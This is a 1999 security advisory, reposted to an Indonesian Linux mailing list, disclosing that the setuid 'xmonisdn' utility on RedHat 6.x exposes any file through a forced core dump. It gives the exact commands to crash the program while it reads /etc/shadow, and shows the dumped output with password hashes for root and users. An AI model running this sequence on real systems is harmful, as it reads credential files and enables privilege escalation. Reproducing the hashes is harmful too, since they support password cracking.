[ Hackerlink ] 'xmonisdn' allows reading of any local files under RedHat 6.x

Sat, 23 Oct 1999 20:01:56 -0700 

          'xmonisdn' allows reading of any local files under RedHat 6.x
----------------------------------------------------------------------------
----


SUMMARY

'xmonisdn', a utility for monitoring and controlling ISDN-activity, 
contains a vulnerability that allows any user to read the content of any 
file he does not have direct read access to (for example, /etc/shadow). 
This can lead to immediate system compromise.

DETAILS

By issuing a few basic commands, any local user can cause the 'xmonisdn' 
program to crash (the program is setuid by default under Linux). The core 
dump contains the content of the file you gave it as a parameter.

Vulnerable systems:
RedHat 6.0 (default kernel)
RedHat 6.1 (default kernel)

Non vulnerable systems:
SuSE Linux 6.1 and 6.2
RedHat 2.0.36
RedHat 2.2.12-OpenWall

Example:
# pwd; ls -al xmonisdn
/usr/bin
-rwsr-xr-x   1 root     root        13528 Mar  4  1998 xmonisdn
# xmonisdn -file /etc/shadow
Warning: Cannot convert string "netactive" to type Pixmap
Warning: Cannot convert string "netactiveout" to type Pixmap
Warning: Cannot convert string "netwaiting" to type Pixmap
Warning: Cannot convert string "netinactive" to type Pixmap
Warning: Cannot convert string "netstart" to type Pixmap
Warning: Cannot convert string "netstop" to type Pixmap

[1]+  Stopped                 xmonisdn -file /etc/shadow
# bg
[1]+ xmonisdn -file /etc/shadow &
# killall -8 xmonisdn
[1]+  Floating point exception(core dumped) xmonisdn -file /etc/shadow
# strings core|less

<snip>
/lib/ld-linux.so.2
root:$1$Fijz9O0n$ku/VSK.h6cbTV5oueAAwz/:10883:0:99999:7:-1:-1:134538500
bin:*:10878:0:99999:7:::
daemon:*:10878:0:99999:7:::
adm:*:10878:0:99999:7:::
lp:*:10878:0:99999:7:::
sync:*:10878:0:99999:7:::
shutdown:*:10878:0:99999:7:::
halt:*:10878:0:99999:7:::
mail:*:10878:0:99999:7:::
news:*:10878:0:99999:7:::
uucp:*:10878:0:99999:7:::
operator:*:10878:0:99999:7:::
games:*:10878:0:99999:7:::
gopher:*:10878:0:99999:7:::
ftp:*:10878:0:99999:7:::
nobody:*:10878:0:99999:7:::
xfs:!!:10878:0:99999:7:::
ronvdaal:$1$Dc92cqLj$V/HSANaVuwCMxGjFfZC/T0:10883:0:99999:7:-1:-1:134538492
syntonix:$1$h3yIM.h/$JjBLYPvb4Zcjv1tb.21Uw/:10883:0:99999:7:-1:-1:134538484
<snip>


ADDITIONAL INFORMATION

This vulnerability has been found by:  <mailto:[EMAIL PROTECTED]> Ron 
van Daal.



======================================== 

-------
AFLHI 058009990407128029/089802---(102598//991024)


    milis ini didukung oleh :
 >> http://www.indolinux.com - dunia linux indonesia
 -------------------------------------------------------------------
 untuk berhenti kirim  email  ke  [EMAIL PROTECTED]
 untuk melihat peraturan kirim email  ke  [EMAIL PROTECTED]
 arsip berada di  http://www.mail-archive.com/[email protected]

Kirim email ke